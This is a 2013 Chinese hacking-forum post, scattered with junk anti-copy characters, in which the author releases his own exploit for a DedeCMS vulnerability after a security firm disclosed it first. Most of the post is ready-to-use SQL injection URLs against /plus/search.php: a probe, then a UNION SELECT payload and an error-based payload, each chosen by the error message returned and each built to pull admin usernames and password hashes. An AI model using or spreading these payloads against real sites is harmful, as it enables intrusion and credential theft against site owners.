转载不加作者名的没JJ
2 E1 P q+ B5 \7 Y8 r6 D6 I1 |
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。' c1 j2 [5 p% v9 R
! t, B8 X7 S7 S1 ~: V6 O既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
: b4 @7 ~" h) z4 \1 N0 k* }
7 U, c+ T+ D( R# z) c3 g我一般是这样测试的:* A' X+ p7 w" D" Z
0 {, O: D7 T& `- T提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
! [0 T* S4 y/ K; f5 f. E, s- t9 T
; | J, E' m5 X: g转载不加作者名的没JJ; D1 E1 H! D$ t' \" l" O
& ^/ v. {! O: t% X: h
作者:鬼哥 K0 s; Q+ v( Q5 a! `' _
5 k5 @& R( W9 e# |& h8 W
: P* w9 \# \) h6 c) z' S* R5 L1 G
: ]; Q1 e, X. R6 ^' a0 R! y看结果如果提示
# Z- g3 f: F. x; u: G3 I( l7 S, O0 ?1 s" Z% O
Safe Alert: Request Error step 2 !
/ R9 x U- F% ~( L {0 I
1 O2 {- b+ w4 ^! I9 T' @那么直接用下面的exp0 r% m0 Z4 C# }4 W
& Y9 B: G1 z6 C8 V. }. uxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
1 x+ |; I! B0 ]7 I+ {& N
7 \) ~4 m- [& z% w. z
1 {# g" E5 q6 a. l+ ^% z看结果如果提示9 V9 D9 {8 O+ i8 R4 o+ E6 V0 J
`" v8 ~# [2 NSafe Alert: Request Error step 1 !! \- h, _: D D0 F* B
, L) r- p* q3 o那么直接用下面的exp( R8 b$ g+ g2 ~1 L4 i; F1 Y9 h: {
1 o- r4 e' V5 o% a, Q
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a2 i7 Z, A+ V1 z7 V$ b$ ~
: V' ^/ R y- ?2 }* N, y0 P$ U
4 [* o2 Y# T, W! l: f2 d2 o) q: T如果正常显示证明漏洞不存在了。, d& K3 d! n0 o1 \4 I5 C2 G' _9 W; y
5 P6 _" _' ?2 s) T; u. ]* }3 \0 ?
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对